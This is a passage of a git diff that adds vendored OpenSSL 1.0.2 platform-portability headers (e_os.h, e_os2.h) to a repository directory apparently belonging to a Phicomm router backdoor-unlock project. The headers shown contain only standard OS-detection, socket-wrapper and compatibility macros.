+#  define WINDOWS
+# endif
+# if defined(OPENSSL_SYS_MSDOS) && !defined(MSDOS)
+#  define MSDOS
+# endif
+
+# if defined(MSDOS) && !defined(GETPID_IS_MEANINGLESS)
+#  define GETPID_IS_MEANINGLESS
+# endif
+
+# ifdef WIN32
+#  define get_last_sys_error()    GetLastError()
+#  define clear_sys_error()       SetLastError(0)
+#  if !defined(WINNT)
+#   define WIN_CONSOLE_BUG
+#  endif
+# else
+#  define get_last_sys_error()    errno
+#  define clear_sys_error()       errno=0
+# endif
+
+# if defined(WINDOWS)
+#  define get_last_socket_error() WSAGetLastError()
+#  define clear_socket_error()    WSASetLastError(0)
+#  define readsocket(s,b,n)       recv((s),(b),(n),0)
+#  define writesocket(s,b,n)      send((s),(b),(n),0)
+# elif defined(__DJGPP__)
+#  define WATT32
+#  define get_last_socket_error() errno
+#  define clear_socket_error()    errno=0
+#  define closesocket(s)          close_s(s)
+#  define readsocket(s,b,n)       read_s(s,b,n)
+#  define writesocket(s,b,n)      send(s,b,n,0)
+# elif defined(MAC_OS_pre_X)
+#  define get_last_socket_error() errno
+#  define clear_socket_error()    errno=0
+#  define closesocket(s)          MacSocket_close(s)
+#  define readsocket(s,b,n)       MacSocket_recv((s),(b),(n),true)
+#  define writesocket(s,b,n)      MacSocket_send((s),(b),(n))
+# elif defined(OPENSSL_SYS_VMS)
+#  define get_last_socket_error() errno
+#  define clear_socket_error()    errno=0
+#  define ioctlsocket(a,b,c)      ioctl(a,b,c)
+#  define closesocket(s)          close(s)
+#  define readsocket(s,b,n)       recv((s),(b),(n),0)
+#  define writesocket(s,b,n)      send((s),(b),(n),0)
+# elif defined(OPENSSL_SYS_VXWORKS)
+#  define get_last_socket_error() errno
+#  define clear_socket_error()    errno=0
+#  define ioctlsocket(a,b,c)          ioctl((a),(b),(int)(c))
+#  define closesocket(s)              close(s)
+#  define readsocket(s,b,n)           read((s),(b),(n))
+#  define writesocket(s,b,n)          write((s),(char *)(b),(n))
+# elif defined(OPENSSL_SYS_BEOS_R5)
+#  define get_last_socket_error() errno
+#  define clear_socket_error()    errno=0
+#  define FIONBIO SO_NONBLOCK
+#  define ioctlsocket(a,b,c)                setsockopt((a),SOL_SOCKET,(b),(c),sizeof(*(c)))
+#  define readsocket(s,b,n)       recv((s),(b),(n),0)
+#  define writesocket(s,b,n)      send((s),(b),(n),0)
+# elif defined(OPENSSL_SYS_NETWARE)
+#  if defined(NETWARE_BSDSOCK)
+#   define get_last_socket_error() errno
+#   define clear_socket_error()    errno=0
+#   define closesocket(s)          close(s)
+#   define ioctlsocket(a,b,c)      ioctl(a,b,c)
+#   if defined(NETWARE_LIBC)
+#    define readsocket(s,b,n)       recv((s),(b),(n),0)
+#    define writesocket(s,b,n)      send((s),(b),(n),0)
+#   else
+#    define readsocket(s,b,n)       recv((s),(char*)(b),(n),0)
+#    define writesocket(s,b,n)      send((s),(char*)(b),(n),0)
+#   endif
+#  else
+#   define get_last_socket_error() WSAGetLastError()
+#   define clear_socket_error()    WSASetLastError(0)
+#   define readsocket(s,b,n)               recv((s),(b),(n),0)
+#   define writesocket(s,b,n)              send((s),(b),(n),0)
+#  endif
+# else
+#  define get_last_socket_error() errno
+#  define clear_socket_error()    errno=0
+#  define ioctlsocket(a,b,c)      ioctl(a,b,c)
+#  define closesocket(s)          close(s)
+#  define readsocket(s,b,n)       read((s),(b),(n))
+#  define writesocket(s,b,n)      write((s),(b),(n))
+# endif
+
+# ifdef WIN16                   /* never the case */
+#  define MS_CALLBACK   _far _loadds
+#  define MS_FAR        _far
+# else
+#  define MS_CALLBACK
+#  define MS_FAR
+# endif
+
+# ifdef OPENSSL_NO_STDIO
+#  undef OPENSSL_NO_FP_API
+#  define OPENSSL_NO_FP_API
+# endif
+
+# if (defined(WINDOWS) || defined(MSDOS))
+
+#  ifdef __DJGPP__
+#   include <unistd.h>
+#   include <sys/stat.h>
+#   include <sys/socket.h>
+#   include <tcp.h>
+#   include <netdb.h>
+#   define _setmode setmode
+#   define _O_TEXT O_TEXT
+#   define _O_BINARY O_BINARY
+#   undef DEVRANDOM
+#   define DEVRANDOM "/dev/urandom\x24"
+#  endif                        /* __DJGPP__ */
+
+#  ifndef S_IFDIR
+#   define S_IFDIR     _S_IFDIR
+#  endif
+
+#  ifndef S_IFMT
+#   define S_IFMT      _S_IFMT
+#  endif
+
+#  if !defined(WINNT) && !defined(__DJGPP__)
+#   define NO_SYSLOG
+#  endif
+#  define NO_DIRENT
+
+#  ifdef WINDOWS
+#   if !defined(_WIN32_WCE) && !defined(_WIN32_WINNT)
+       /*
+        * Defining _WIN32_WINNT here in e_os.h implies certain "discipline."
+        * Most notably we ought to check for availability of each specific
+        * routine with GetProcAddress() and/or guard NT-specific calls with
+        * GetVersion() < 0x80000000. One can argue that in latter "or" case
+        * we ought to /DELAYLOAD some .DLLs in order to protect ourselves
+        * against run-time link errors. This doesn't seem to be necessary,
+        * because it turned out that already Windows 95, first non-NT Win32
+        * implementation, is equipped with at least NT 3.51 stubs, dummy
+        * routines with same name, but which do nothing. Meaning that it's
+        * apparently sufficient to guard "vanilla" NT calls with GetVersion
+        * alone, while NT 4.0 and above interfaces ought to be linked with
+        * GetProcAddress at run-time.
+        */
+#    define _WIN32_WINNT 0x0400
+#   endif
+#   if !defined(OPENSSL_NO_SOCK) && (defined(_WIN32_WINNT) || defined(_WIN32_WCE))
+       /*
+        * Just like defining _WIN32_WINNT including winsock2.h implies
+        * certain "discipline" for maintaining [broad] binary compatibility.
+        * As long as structures are invariant among Winsock versions,
+        * it's sufficient to check for specific Winsock2 API availability
+        * at run-time [DSO_global_lookup is recommended]...
+        */
+#    include <winsock2.h>
+#    include <ws2tcpip.h>
+       /* yes, they have to be #included prior to <windows.h> */
+#   endif
+#   include <windows.h>
+#   include <stdio.h>
+#   include <stddef.h>
+#   include <errno.h>
+#   if defined(_WIN32_WCE) && !defined(EACCES)
+#    define EACCES   13
+#   endif
+#   include <string.h>
+#   ifdef _WIN64
+#    define strlen(s) _strlen31(s)
+/* cut strings to 2GB */
+static __inline unsigned int _strlen31(const char *str)
+{
+    unsigned int len = 0;
+    while (*str && len < 0x80000000U)
+        str++, len++;
+    return len & 0x7FFFFFFF;
+}
+#   endif
+#   include <malloc.h>
+#   if defined(_MSC_VER) && _MSC_VER<=1200 && defined(_MT) && defined(isspace)
+       /* compensate for bug in VC6 ctype.h */
+#    undef isspace
+#    undef isdigit
+#    undef isalnum
+#    undef isupper
+#    undef isxdigit
+#   endif
+#   if defined(_MSC_VER) && !defined(_WIN32_WCE) && !defined(_DLL) && defined(stdin)
+#    if _MSC_VER>=1300 && _MSC_VER<1600
+#     undef stdin
+#     undef stdout
+#     undef stderr
+FILE *__iob_func();
+#     define stdin  (&__iob_func()[0])
+#     define stdout (&__iob_func()[1])
+#     define stderr (&__iob_func()[2])
+#    elif _MSC_VER<1300 && defined(I_CAN_LIVE_WITH_LNK4049)
+#     undef stdin
+#     undef stdout
+#     undef stderr
+         /*
+          * pre-1300 has __p__iob(), but it's available only in msvcrt.lib,
+          * or in other words with /MD. Declaring implicit import, i.e. with
+          * _imp_ prefix, works correctly with all compiler options, but
+          * without /MD results in LINK warning LNK4049: 'locally defined
+          * symbol "__iob" imported'.
+          */
+extern FILE *_imp___iob;
+#     define stdin  (&_imp___iob[0])
+#     define stdout (&_imp___iob[1])
+#     define stderr (&_imp___iob[2])
+#    endif
+#   endif
+#  endif
+#  include <io.h>
+#  include <fcntl.h>
+
+#  ifdef OPENSSL_SYS_WINCE
+#   define OPENSSL_NO_POSIX_IO
+#  endif
+
+#  if defined (__BORLANDC__)
+#   define _setmode setmode
+#   define _O_TEXT O_TEXT
+#   define _O_BINARY O_BINARY
+#   define _int64 __int64
+#   define _kbhit kbhit
+#  endif
+
+#  define EXIT(n) exit(n)
+#  define LIST_SEPARATOR_CHAR ';'
+#  ifndef X_OK
+#   define X_OK        0
+#  endif
+#  ifndef W_OK
+#   define W_OK        2
+#  endif
+#  ifndef R_OK
+#   define R_OK        4
+#  endif
+#  define OPENSSL_CONF  "openssl.cnf"
+#  define SSLEAY_CONF   OPENSSL_CONF
+#  define NUL_DEV       "nul"
+#  define RFILE         ".rnd"
+#  ifdef OPENSSL_SYS_WINCE
+#   define DEFAULT_HOME  ""
+#  else
+#   define DEFAULT_HOME  "C:"
+#  endif
+
+/* Avoid Visual Studio 13 GetVersion deprecated problems */
+#  if defined(_MSC_VER) && _MSC_VER>=1800
+#   define check_winnt() (1)
+#   define check_win_minplat(x) (1)
+#  else
+#   define check_winnt() (GetVersion() < 0x80000000)
+#   define check_win_minplat(x) (LOBYTE(LOWORD(GetVersion())) >= (x))
+#  endif
+
+# else                          /* The non-microsoft world */
+
+#  ifdef OPENSSL_SYS_VMS
+#   define VMS 1
+  /*
+   * some programs don't include stdlib, so exit() and others give implicit
+   * function warnings
+   */
+#   include <stdlib.h>
+#   if defined(__DECC)
+#    include <unistd.h>
+#   else
+#    include <unixlib.h>
+#   endif
+#   define OPENSSL_CONF        "openssl.cnf"
+#   define SSLEAY_CONF         OPENSSL_CONF
+#   define RFILE               ".rnd"
+#   define LIST_SEPARATOR_CHAR ','
+#   define NUL_DEV             "NLA0:"
+  /* We don't have any well-defined random devices on VMS, yet... */
+#   undef DEVRANDOM
+  /*-
+     We need to do this since VMS has the following coding on status codes:
+
+     Bits 0-2: status type: 0 = warning, 1 = success, 2 = error, 3 = info ...
+               The important thing to know is that odd numbers are considered
+               good, while even ones are considered errors.
+     Bits 3-15: actual status number
+     Bits 16-27: facility number.  0 is considered "unknown"
+     Bits 28-31: control bits.  If bit 28 is set, the shell won't try to
+                 output the message (which, for random codes, just looks ugly)
+
+     So, what we do here is to change 0 to 1 to get the default success status,
+     and everything else is shifted up to fit into the status number field, and
+     the status is tagged as an error, which I believe is what is wanted here.
+     -- Richard Levitte
+  */
+#   define EXIT(n)             do { int __VMS_EXIT = n; \
+                                     if (__VMS_EXIT == 0) \
+                                       __VMS_EXIT = 1; \
+                                     else \
+                                       __VMS_EXIT = (n << 3) | 2; \
+                                     __VMS_EXIT |= 0x10000000; \
+                                     exit(__VMS_EXIT); } while(0)
+#   define NO_SYS_PARAM_H
+
+#  elif defined(OPENSSL_SYS_NETWARE)
+#   include <fcntl.h>
+#   include <unistd.h>
+#   define NO_SYS_TYPES_H
+#   undef  DEVRANDOM
+#   ifdef NETWARE_CLIB
+#    define getpid GetThreadID
+extern int GetThreadID(void);
+/* #      include <conio.h> */
+extern int kbhit(void);
+#   else
+#    include <screen.h>
+#   endif
+#   define NO_SYSLOG
+#   define _setmode setmode
+#   define _kbhit kbhit
+#   define _O_TEXT O_TEXT
+#   define _O_BINARY O_BINARY
+#   define OPENSSL_CONF   "openssl.cnf"
+#   define SSLEAY_CONF    OPENSSL_CONF
+#   define RFILE    ".rnd"
+#   define LIST_SEPARATOR_CHAR ';'
+#   define EXIT(n)  { if (n) printf("ERROR: %d\n", (int)n); exit(n); }
+
+#  else
+     /* !defined VMS */
+#   ifdef OPENSSL_SYS_MPE
+#    define NO_SYS_PARAM_H
+#   endif
+#   ifdef OPENSSL_UNISTD
+#    include OPENSSL_UNISTD
+#   else
+#    include <unistd.h>
+#   endif
+#   ifndef NO_SYS_TYPES_H
+#    include <sys/types.h>
+#   endif
+#   if defined(NeXT) || defined(OPENSSL_SYS_NEWS4)
+#    define pid_t int           /* pid_t is missing on NEXTSTEP/OPENSTEP
+                                 * (unless when compiling with
+                                 * -D_POSIX_SOURCE, which doesn't work for
+                                 * us) */
+#   endif
+#   ifdef OPENSSL_SYS_NEWS4     /* setvbuf is missing on mips-sony-bsd */
+#    define setvbuf(a, b, c, d) setbuffer((a), (b), (d))
+typedef unsigned long clock_t;
+#   endif
+#   ifdef OPENSSL_SYS_WIN32_CYGWIN
+#    include <io.h>
+#    include <fcntl.h>
+#   endif
+
+#   define OPENSSL_CONF        "openssl.cnf"
+#   define SSLEAY_CONF         OPENSSL_CONF
+#   define RFILE               ".rnd"
+#   define LIST_SEPARATOR_CHAR ':'
+#   define NUL_DEV             "/dev/null"
+#   define EXIT(n)             exit(n)
+#  endif
+
+#  define SSLeay_getpid()       getpid()
+
+# endif
+
+/*************/
+
+# if defined(OPENSSL_NO_SOCK) && !defined(OPENSSL_NO_DGRAM)
+#  define OPENSSL_NO_DGRAM
+# endif
+
+# ifdef USE_SOCKETS
+#  if defined(WINDOWS) || defined(MSDOS)
+      /* windows world */
+
+#   ifdef OPENSSL_NO_SOCK
+#    define SSLeay_Write(a,b,c)       (-1)
+#    define SSLeay_Read(a,b,c)        (-1)
+#    define SHUTDOWN(fd)              close(fd)
+#    define SHUTDOWN2(fd)             close(fd)
+#   elif !defined(__DJGPP__)
+#    if defined(_WIN32_WCE) && _WIN32_WCE<410
+#     define getservbyname _masked_declaration_getservbyname
+#    endif
+#    if !defined(IPPROTO_IP)
+         /* winsock[2].h was included already? */
+#     include <winsock.h>
+#    endif
+#    ifdef getservbyname
+#     undef getservbyname
+         /* this is used to be wcecompat/include/winsock_extras.h */
+struct servent *PASCAL getservbyname(const char *, const char *);
+#    endif
+
+#    ifdef _WIN64
+/*
+ * Even though sizeof(SOCKET) is 8, it's safe to cast it to int, because
+ * the value constitutes an index in per-process table of limited size
+ * and not a real pointer.
+ */
+#     define socket(d,t,p)   ((int)socket(d,t,p))
+#     define accept(s,f,l)   ((int)accept(s,f,l))
+#    endif
+#    define SSLeay_Write(a,b,c)       send((a),(b),(c),0)
+#    define SSLeay_Read(a,b,c)        recv((a),(b),(c),0)
+#    define SHUTDOWN(fd)              { shutdown((fd),0); closesocket(fd); }
+#    define SHUTDOWN2(fd)             { shutdown((fd),2); closesocket(fd); }
+#   else
+#    define SSLeay_Write(a,b,c)       write_s(a,b,c,0)
+#    define SSLeay_Read(a,b,c)        read_s(a,b,c)
+#    define SHUTDOWN(fd)              close_s(fd)
+#    define SHUTDOWN2(fd)             close_s(fd)
+#   endif
+
+#  elif defined(MAC_OS_pre_X)
+
+#   include "MacSocket.h"
+#   define SSLeay_Write(a,b,c)         MacSocket_send((a),(b),(c))
+#   define SSLeay_Read(a,b,c)          MacSocket_recv((a),(b),(c),true)
+#   define SHUTDOWN(fd)                MacSocket_close(fd)
+#   define SHUTDOWN2(fd)               MacSocket_close(fd)
+
+#  elif defined(OPENSSL_SYS_NETWARE)
+         /*
+          * NetWare uses the WinSock2 interfaces by default, but can be
+          * configured for BSD
+          */
+#   if defined(NETWARE_BSDSOCK)
+#    include <sys/socket.h>
+#    include <netinet/in.h>
+#    include <sys/time.h>
+#    if defined(NETWARE_CLIB)
+#     include <sys/bsdskt.h>
+#    else
+#     include <sys/select.h>
+#    endif
+#    define INVALID_SOCKET (int)(~0)
+#   else
+#    include <novsock2.h>
+#   endif
+#   define SSLeay_Write(a,b,c)   send((a),(b),(c),0)
+#   define SSLeay_Read(a,b,c) recv((a),(b),(c),0)
+#   define SHUTDOWN(fd)    { shutdown((fd),0); closesocket(fd); }
+#   define SHUTDOWN2(fd)      { shutdown((fd),2); closesocket(fd); }
+
+#  else
+
+#   ifndef NO_SYS_PARAM_H
+#    include <sys/param.h>
+#   endif
+#   ifdef OPENSSL_SYS_VXWORKS
+#    include <time.h>
+#   elif !defined(OPENSSL_SYS_MPE)
+#    include <sys/time.h>       /* Needed under linux for FD_XXX */
+#   endif
+
+#   include <netdb.h>
+#   if defined(OPENSSL_SYS_VMS_NODECC)
+#    include <socket.h>
+#    include <in.h>
+#    include <inet.h>
+#   else
+#    include <sys/socket.h>
+#    ifdef FILIO_H
+#     include <sys/filio.h>     /* Added for FIONBIO under unixware */
+#    endif
+#    include <netinet/in.h>
+#    if !defined(OPENSSL_SYS_BEOS_R5)
+#     include <arpa/inet.h>
+#    endif
+#   endif
+
+#   if defined(NeXT) || defined(_NEXT_SOURCE)
+#    include <sys/fcntl.h>
+#    include <sys/types.h>
+#   endif
+
+#   ifdef OPENSSL_SYS_AIX
+#    include <sys/select.h>
+#   endif
+
+#   ifdef __QNX__
+#    include <sys/select.h>
+#   endif
+
+#   if defined(sun)
+#    include <sys/filio.h>
+#   else
+#    ifndef VMS
+#     include <sys/ioctl.h>
+#    else
+         /* ioctl is only in VMS > 7.0 and when socketshr is not used */
+#     if !defined(TCPIP_TYPE_SOCKETSHR) && defined(__VMS_VER) && (__VMS_VER > 70000000)
+#      include <sys/ioctl.h>
+#     endif
+#    endif
+#   endif
+
+#   ifdef VMS
+#    include <unixio.h>
+#    if defined(TCPIP_TYPE_SOCKETSHR)
+#     include <socketshr.h>
+#    endif
+#   endif
+
+#   define SSLeay_Read(a,b,c)     read((a),(b),(c))
+#   define SSLeay_Write(a,b,c)    write((a),(b),(c))
+#   define SHUTDOWN(fd)    { shutdown((fd),0); closesocket((fd)); }
+#   define SHUTDOWN2(fd)   { shutdown((fd),2); closesocket((fd)); }
+#   ifndef INVALID_SOCKET
+#    define INVALID_SOCKET      (-1)
+#   endif                       /* INVALID_SOCKET */
+#  endif
+
+/*
+ * Some IPv6 implementations are broken, disable them in known bad versions.
+ */
+#  if !defined(OPENSSL_USE_IPV6)
+#   if defined(AF_INET6) && !defined(OPENSSL_SYS_BEOS_BONE) && !defined(NETWARE_CLIB)
+#    define OPENSSL_USE_IPV6 1
+#   else
+#    define OPENSSL_USE_IPV6 0
+#   endif
+#  endif
+
+# endif
+
+# if defined(sun) && !defined(__svr4__) && !defined(__SVR4)
+  /* include headers first, so our defines don't break it */
+#  include <stdlib.h>
+#  include <string.h>
+  /* bcopy can handle overlapping moves according to SunOS 4.1.4 manpage */
+#  define memmove(s1,s2,n) bcopy((s2),(s1),(n))
+#  define strtoul(s,e,b) ((unsigned long int)strtol((s),(e),(b)))
+extern char *sys_errlist[];
+extern int sys_nerr;
+#  define strerror(errnum) \
+        (((errnum)<0 || (errnum)>=sys_nerr) ? NULL : sys_errlist[errnum])
+  /* Being signed SunOS 4.x memcpy breaks ASN1_OBJECT table lookup */
+#  include "crypto/o_str.h"
+#  define memcmp OPENSSL_memcmp
+# endif
+
+# ifndef OPENSSL_EXIT
+#  if defined(MONOLITH) && !defined(OPENSSL_C)
+#   define OPENSSL_EXIT(n) return(n)
+#  else
+#   define OPENSSL_EXIT(n) do { EXIT(n); return(n); } while(0)
+#  endif
+# endif
+
+/***********************************************/
+
+# define DG_GCC_BUG             /* gcc < 2.6.3 on DGUX */
+
+# ifdef sgi
+#  define IRIX_CC_BUG           /* all version of IRIX I've tested (4.* 5.*) */
+# endif
+# ifdef OPENSSL_SYS_SNI
+#  define IRIX_CC_BUG           /* CDS++ up to V2.0Bsomething suffered from
+                                 * the same bug. */
+# endif
+
+# if defined(OPENSSL_SYS_WINDOWS)
+#  define strcasecmp _stricmp
+#  define strncasecmp _strnicmp
+# elif defined(OPENSSL_SYS_VMS)
+/* VMS below version 7.0 doesn't have strcasecmp() */
+#  include "o_str.h"
+#  define strcasecmp OPENSSL_strcasecmp
+#  define strncasecmp OPENSSL_strncasecmp
+#  define OPENSSL_IMPLEMENTS_strncasecmp
+# elif defined(OPENSSL_SYS_OS2) && defined(__EMX__)
+#  define strcasecmp stricmp
+#  define strncasecmp strnicmp
+# elif defined(OPENSSL_SYS_NETWARE)
+#  include <string.h>
+#  if defined(NETWARE_CLIB)
+#   define strcasecmp stricmp
+#   define strncasecmp strnicmp
+#  endif                        /* NETWARE_CLIB */
+# endif
+
+# if defined(OPENSSL_SYS_OS2) && defined(__EMX__)
+#  include <io.h>
+#  include <fcntl.h>
+#  define NO_SYSLOG
+# endif
+
+/* vxworks */
+# if defined(OPENSSL_SYS_VXWORKS)
+#  include <ioLib.h>
+#  include <tickLib.h>
+#  include <sysLib.h>
+
+#  define TTY_STRUCT int
+
+#  define sleep(a) taskDelay((a) * sysClkRateGet())
+
+#  include <vxWorks.h>
+#  include <sockLib.h>
+#  include <taskLib.h>
+
+#  define getpid taskIdSelf
+
+/*
+ * NOTE: these are implemented by helpers in database app! if the database is
+ * not linked, we need to implement them elswhere
+ */
+struct hostent *gethostbyname(const char *name);
+struct hostent *gethostbyaddr(const char *addr, int length, int type);
+struct servent *getservbyname(const char *name, const char *proto);
+
+# endif
+/* end vxworks */
+
+/* beos */
+# if defined(OPENSSL_SYS_BEOS_R5)
+#  define SO_ERROR 0
+#  define NO_SYS_UN
+#  define IPPROTO_IP 0
+#  include <OS.h>
+# endif
+
+# if !defined(inline) && !defined(__cplusplus)
+#  if defined(__STDC_VERSION__) && __STDC_VERSION__>=199901L
+   /* do nothing, inline works */
+#  elif defined(__GNUC__) && __GNUC__>=2
+#   define inline __inline__
+#  elif defined(_MSC_VER)
+  /*
+   * Visual Studio: inline is available in C++ only, however
+   * __inline is available for C, see
+   * http://msdn.microsoft.com/en-us/library/z8y1yy88.aspx
+   */
+#   define inline __inline
+#  else
+#   define inline
+#  endif
+# endif
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/e_os2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/e_os2.h
new file mode 100644
index 0000000..613607f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/e_os2.h
@@ -0,0 +1,322 @@
+/* e_os2.h */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/opensslconf.h>
+
+#ifndef HEADER_E_OS2_H
+# define HEADER_E_OS2_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/******************************************************************************
+ * Detect operating systems.  This probably needs completing.
+ * The result is that at least one OPENSSL_SYS_os macro should be defined.
+ * However, if none is defined, Unix is assumed.
+ **/
+
+# define OPENSSL_SYS_UNIX
+
+/* ---------------------- Macintosh, before MacOS X ----------------------- */
+# if defined(__MWERKS__) && defined(macintosh) || defined(OPENSSL_SYSNAME_MAC)
+#  undef OPENSSL_SYS_UNIX
+#  define OPENSSL_SYS_MACINTOSH_CLASSIC
+# endif
+
+/* ---------------------- NetWare ----------------------------------------- */
+# if defined(NETWARE) || defined(OPENSSL_SYSNAME_NETWARE)
+#  undef OPENSSL_SYS_UNIX
+#  define OPENSSL_SYS_NETWARE
+# endif
+
+/* --------------------- Microsoft operating systems ---------------------- */
+
+/*
+ * Note that MSDOS actually denotes 32-bit environments running on top of
+ * MS-DOS, such as DJGPP one.
+ */
+# if defined(OPENSSL_SYSNAME_MSDOS)
+#  undef OPENSSL_SYS_UNIX
+#  define OPENSSL_SYS_MSDOS
+# endif
+
+/*
+ * For 32 bit environment, there seems to be the CygWin environment and then
+ * all the others that try to do the same thing Microsoft does...
+ */
+# if defined(OPENSSL_SYSNAME_UWIN)
+#  undef OPENSSL_SYS_UNIX
+#  define OPENSSL_SYS_WIN32_UWIN
+# else
+#  if defined(__CYGWIN__) || defined(OPENSSL_SYSNAME_CYGWIN)
+#   undef OPENSSL_SYS_UNIX
+#   define OPENSSL_SYS_WIN32_CYGWIN
+#  else
+#   if defined(_WIN32) || defined(OPENSSL_SYSNAME_WIN32)
+#    undef OPENSSL_SYS_UNIX
+#    define OPENSSL_SYS_WIN32
+#   endif
+#   if defined(OPENSSL_SYSNAME_WINNT)
+#    undef OPENSSL_SYS_UNIX
+#    define OPENSSL_SYS_WINNT
+#   endif
+#   if defined(OPENSSL_SYSNAME_WINCE)
+#    undef OPENSSL_SYS_UNIX
+#    define OPENSSL_SYS_WINCE
+#   endif
+#  endif
+# endif
+
+/* Anything that tries to look like Microsoft is "Windows" */
+# if defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_WINNT) || defined(OPENSSL_SYS_WINCE)
+#  undef OPENSSL_SYS_UNIX
+#  define OPENSSL_SYS_WINDOWS
+#  ifndef OPENSSL_SYS_MSDOS
+#   define OPENSSL_SYS_MSDOS
+#  endif
+# endif
+
+/*
+ * DLL settings.  This part is a bit tough, because it's up to the
+ * application implementor how he or she will link the application, so it
+ * requires some macro to be used.
+ */
+# ifdef OPENSSL_SYS_WINDOWS
+#  ifndef OPENSSL_OPT_WINDLL
+#   if defined(_WINDLL)         /* This is used when building OpenSSL to
+                                 * indicate that DLL linkage should be used */
+#    define OPENSSL_OPT_WINDLL
+#   endif
+#  endif
+# endif
+
+/* ------------------------------- OpenVMS -------------------------------- */
+# if defined(__VMS) || defined(VMS) || defined(OPENSSL_SYSNAME_VMS)
+#  undef OPENSSL_SYS_UNIX
+#  define OPENSSL_SYS_VMS
+#  if defined(__DECC)
+#   define OPENSSL_SYS_VMS_DECC
+#  elif defined(__DECCXX)
+#   define OPENSSL_SYS_VMS_DECC
+#   define OPENSSL_SYS_VMS_DECCXX
+#  else
+#   define OPENSSL_SYS_VMS_NODECC
+#  endif
+# endif
+
+/* -------------------------------- OS/2 ---------------------------------- */
+# if defined(__EMX__) || defined(__OS2__)
+#  undef OPENSSL_SYS_UNIX
+#  define OPENSSL_SYS_OS2
+# endif
+
+/* -------------------------------- Unix ---------------------------------- */
+# ifdef OPENSSL_SYS_UNIX
+#  if defined(linux) || defined(__linux__) || defined(OPENSSL_SYSNAME_LINUX)
+#   define OPENSSL_SYS_LINUX
+#  endif
+#  ifdef OPENSSL_SYSNAME_MPE
+#   define OPENSSL_SYS_MPE
+#  endif
+#  ifdef OPENSSL_SYSNAME_SNI
+#   define OPENSSL_SYS_SNI
+#  endif
+#  ifdef OPENSSL_SYSNAME_ULTRASPARC
+#   define OPENSSL_SYS_ULTRASPARC
+#  endif
+#  ifdef OPENSSL_SYSNAME_NEWS4
+#   define OPENSSL_SYS_NEWS4
+#  endif
+#  ifdef OPENSSL_SYSNAME_MACOSX
+#   define OPENSSL_SYS_MACOSX
+#  endif
+#  ifdef OPENSSL_SYSNAME_MACOSX_RHAPSODY
+#   define OPENSSL_SYS_MACOSX_RHAPSODY
+#   define OPENSSL_SYS_MACOSX
+#  endif
+#  ifdef OPENSSL_SYSNAME_SUNOS
+#   define OPENSSL_SYS_SUNOS
+#  endif
+#  if defined(_CRAY) || defined(OPENSSL_SYSNAME_CRAY)
+#   define OPENSSL_SYS_CRAY
+#  endif
+#  if defined(_AIX) || defined(OPENSSL_SYSNAME_AIX)
+#   define OPENSSL_SYS_AIX
+#  endif
+# endif
+
+/* -------------------------------- VOS ----------------------------------- */
+# if defined(__VOS__) || defined(OPENSSL_SYSNAME_VOS)
+#  define OPENSSL_SYS_VOS
+#  ifdef __HPPA__
+#   define OPENSSL_SYS_VOS_HPPA
+#  endif
+#  ifdef __IA32__
+#   define OPENSSL_SYS_VOS_IA32
+#  endif
+# endif
+
+/* ------------------------------ VxWorks --------------------------------- */
+# ifdef OPENSSL_SYSNAME_VXWORKS
+#  define OPENSSL_SYS_VXWORKS
+# endif
+
+/* -------------------------------- BeOS ---------------------------------- */
+# if defined(__BEOS__)
+#  define OPENSSL_SYS_BEOS
+#  include <sys/socket.h>
+#  if defined(BONE_VERSION)
+#   define OPENSSL_SYS_BEOS_BONE
+#  else
+#   define OPENSSL_SYS_BEOS_R5
+#  endif
+# endif
+
+/**
+ * That's it for OS-specific stuff
+ *****************************************************************************/
+
+/* Specials for I/O an exit */
+# ifdef OPENSSL_SYS_MSDOS
+#  define OPENSSL_UNISTD_IO <io.h>
+#  define OPENSSL_DECLARE_EXIT extern void exit(int);
+# else
